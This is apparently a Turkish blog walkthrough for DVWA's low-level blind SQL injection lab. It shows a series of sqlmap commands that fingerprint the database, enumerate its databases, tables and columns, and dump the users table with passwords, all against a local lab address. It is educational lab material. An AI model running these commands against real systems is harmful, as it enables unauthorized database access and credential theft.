Şubat 06, 2023
11 11 11 ÖÖ
2048 Old Game Privacy Policy
Scan Text – Metin Tarayıcı Terms & Conditions
Scan Text – Metin Tarayıcı Privacy Policy
Calculator – Hesap Makinesi Privacy Policy
Calculator – Hesap Makinesi Terms & Conditions
QR Code Reader – Kare Kod Okuyucu Terms & Conditions
QR Code Reader – Kare Kod Okuyucu Privacy Policy
Show PDF – PDF Görüntüleyici Terms & Conditions
Show PDF – PDF Görüntüleyici Privacy Policy
Photo Editor – Resim Düzenleme Uygulaması Terms & Conditions
Son Yazılar
2048 Old Game Privacy Policy Scan Text – Metin Tarayıcı Terms & Conditions Scan Text – Metin Tarayıcı Privacy Policy Calculator – Hesap Makinesi Privacy Policy Calculator – Hesap Makinesi Terms & Conditions QR Code Reader – Kare Kod Okuyucu Terms & Conditions QR Code Reader – Kare Kod Okuyucu Privacy Policy Show PDF – PDF Görüntüleyici Terms & Conditions Show PDF – PDF Görüntüleyici Privacy Policy Photo Editor – Resim Düzenleme Uygulaması Terms & Conditions
dvwa walkthrough

BLIND SQL INJECTION (Low Level)

Paylaşım , Takip İçin

Blind Sql Injection Nedir ?

Blind sql injection bildiğiniz üzere önceki yazılarımda anlattığım sql injectionun çıktısının olmadığı bir saldırı türüdür. Yani hatalarımızın yer almadığı , çıktımızın tırnak işaretiyle gösterilemeyeceği bir injection türüdür. Bunun için körleme sql injection da normal sql injectiondaki gibi komutlar girerekte zafiyetimizi bulabiliriz fakat körleme olduğu için oldukça uzun sürebilir. Bu yüzden sqlmap kullanarak zafiyetimizi kullanacağız.

Öncelikle ilk adım olarak burpsuite veya owasp ile bu körleme işlemleri uzun olacağı için otomatik yapan sqlmap kullanacağız .

İhtiyacımız olan PHPSESSID ‘dir. Tarayıcınızda f12 basarak resources kısmından da bulabilirsiniz veya burpsuit , owaspda da görebilirsiniz.

 

Gördüğünüz gibi PHPSESSID mizi bulduk daha sonrasında sql mapa geçiş yapacağız.

sqlmap -u “http://192.168.138.129/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” –cookie=”security=low; PHPSESSID=ce85a2f406d7978cb7e276a81825e61a

DBMS’NİN MySQL 5.0.12 olduğunu, işletim sisteminin Ubuntu olduğunu ve Web sunucusunun Apache 2.4.29 olduğunu keşfettik. 

Daha sonra -dbs diyerek DBMS’yi görmeye yani veritabanını görmeye zorluyoruz.

sqlmap -u “http://192.168.138.129/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” –cookie=”security=low; PHPSESSID=ce85a2f406d7978cb7e276a81825e61a” –dbs

İsimlerini bulduk sonrasında -d diyerek tabloları bulmak için zorlayalım.

sqlmap -u “http://192.168.138.129/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” –cookie=”security=low; PHPSESSID=ce85a2f406d7978cb7e276a81825e61a” –dbs -D dvwa –tables

Tablolarıda bulduğumuza göre sırada kolonları bulmak var. –

sqlmap -u “http://192.168.138.129/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” –cookie=”security=low; PHPSESSID=ce85a2f406d7978cb7e276a81825e61a” –dbs -D dvwa -T users –columns

Ve users sütununu bulduğumuza göre dumplarımızı alabiliriz. -D dvwa -T user –dump kodunu kullanarak sonuca varıyoruz.

sqlmap -u “http://192.168.138.129/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#” –cookie=”security=low; PHPSESSID=ce85a2f406d7978cb7e276a81825e61a” –dbs -D dvwa -T user –dump

Gördüğünüz gibi şifreleri almış bulunduk sıra geleceğiz medium levele.


Paylaşım , Takip İçin
0 0 votes
Article Rating

Bir Cevap Yazın

0 Yorum
Inline Feedbacks
View all comments
0
Would love your thoughts, please comment.x
HAYALİNDEKİ YAZILIM
%d blogcu bunu beğendi: